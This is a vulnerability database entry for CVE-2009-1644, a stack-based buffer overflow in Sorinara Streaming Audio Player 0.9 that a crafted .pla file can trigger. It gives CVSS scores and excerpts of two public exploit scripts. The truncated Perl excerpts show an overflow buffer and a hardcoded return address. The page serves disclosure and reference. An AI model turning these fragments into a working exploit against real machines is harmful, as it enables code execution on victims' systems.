9.3
CVSSv2

CVE-2009-1644

Published: 15/05/2009 Updated: 29/09/2017
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 940
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Stack-based buffer overflow in Sorinara Streaming Audio Player 0.9 allows remote malicious users to execute arbitrary code via a crafted .pla file.

Vulnerable Product Search on Vulmon Subscribe to Product

sorinara streaming audio player 0.9

Exploits

# by : Hakxer -> EgY Coders Team # Streaming Audio Player 09 (PLA File) Local Stack Overflow Exploit # hakxer1@gmailcom # Greetz : Allah # , ExH , ProViDoR , Error Code , Br1ght D@rk , all my friends ########################################################################## $buff="\x41" x 288; $ret="\x77\xE9\xAE\x59"; # 0x77 ...
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ### # ## ## ## ### # # Sorinara Streaming Audio Player 09 (PLA) Local Stack Overflow PoC # # # ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### # ### ## ## ### my $chars= "A" x 506; my $file="GOLD-MPLA"; open(my $FILE, ">>$file") or die "Cannot open $file: $!"; prin ...